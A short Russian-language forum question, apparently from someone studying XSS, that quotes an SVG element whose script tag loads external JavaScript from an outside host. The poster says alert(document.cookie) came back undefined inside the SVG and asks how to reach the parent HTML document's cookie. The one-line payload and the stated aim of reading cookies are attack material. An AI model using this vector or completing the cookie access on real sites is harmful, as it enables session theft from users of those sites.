Я изучаю XSS. Я знал, что есть уязвимость в объекте HTML SVG.
источник здесь
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="0" height="0" id="xss"><script type="text/ecmascript" xlink:href="http://blahblahblah.com/~blah/xss/xss.js"></script></svg>
Я пробовал это в xss.js
alert(document.cookie);
но значение cookie было "неопределенным"
в объекте SVG есть объект Document, но он отличается от объекта документа HTML.
Затем, как я могу получить родительский объект документа для файла cookie?
Пожалуйста помоги.
Спасибо за чтение.